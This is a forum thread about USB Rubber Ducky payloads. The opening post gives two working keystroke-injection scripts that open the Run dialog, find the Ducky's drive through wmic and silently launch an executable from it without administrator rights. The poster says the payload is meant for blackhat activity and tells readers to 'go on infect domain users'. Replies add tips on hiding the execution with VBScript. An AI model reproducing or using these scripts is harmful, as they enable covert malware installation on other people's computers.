AgentGod Posted January 25, 2014 Share Posted January 25, 2014 (edited) For long I have been searching around for a payload as such, but the only thing I found was the following;https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---runexe-from-sdWhich essentially is not even 10% efficient. You need Administrative rights to use the Payload above (Diskpart) and what's with the Vbs. If you really do want to execute and run, you do not need to put the file in temp. You can put your file in a Winrar SFX which will put your malware into which folder you wish and run it there. Tutorial on that will come later, as I have too much to do.The below payload takes 3-4 seconds before executing. You have to remount (Plug in the Rubber ducky, let it install drivers, then replug it and have your file be executed).DELAY 3000GUI rDELAY 100STRING cmd /c for /f %a in ('wmic logicaldisk get volumename^, name ^| find "DUCKY"') do start "" /D %a\ %a\DUCKY.exeDELAY 10ENTERThat one is one of the codes, simple AF. It goes into Run line, uses the wmic logicaldisk command to search for the drive name of anything you want (Ducky) and executes it in matter of seconds. I believe the Terminal is up for a matter of seconds not even that.You can use the Twin Ducky to have your file stored on your ducky. I believe you can loop the command above so you do not need to replug, but it will just take long and is not worth it.This is another code, does the same, but is shorter:DELAY 3000GUI rDELAY 100cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exeDELAY 10ENTERThe code above is almost instant (Depends on your malware size)And yes, this payload is meant for Blackhat activity. If you do edit it, do give proper credits.New scripts will come, making it easier for all of us to execute our files, going back to normal fast Autorun, not a 3 page long script that takes 15 minutes to execute.I forgot to mention, this does not require administrative rights, so no need to bypass the freaking UAC problems. And go on infect domain users.Winrar SFX: Edited January 25, 2014 by AgentGod Quote Link to comment Share on other sites More sharing options...
overwraith Posted January 25, 2014 Share Posted January 25, 2014 I am relatively new to the whole hacking scene, and I did not know until recently that diskpart was an admin tool. The whole idea behind runexe from SD was to make a batch file that waited for the ducky SD card to be mounted. The ducky SD card mounting did not used to be as efficient as it is today. Yes, there is room for improvement, or even replacement of my code. I am really only into this hacking thing on free time, and I do not have the pen testing knowledge that somebody trained in the field would have. The VBS thing is actually a technique for running a batch file on windows silently. Recent windows versions took that ability away, so a workaround was required, hence the VBS. As I was saying before there used to be a substantial delay between when the keyboard would run, and when the SD was mounted. You could use the button, but I wanted something that would automatically run, so a batch file was needed. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted January 25, 2014 Share Posted January 25, 2014 (edited) You could always use a VBScript to detect when the drive is there, then write the ducky drive letter to a .bat file. Then execute that Best thing is the VBScript won't be shown in any kind of console/terminal, so you are really going to make the script covert! EDIT: I see that a newer vbscript has been added with the same properties. Just use that and modify if you have any further troubles. Edited January 25, 2014 by MB60893 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.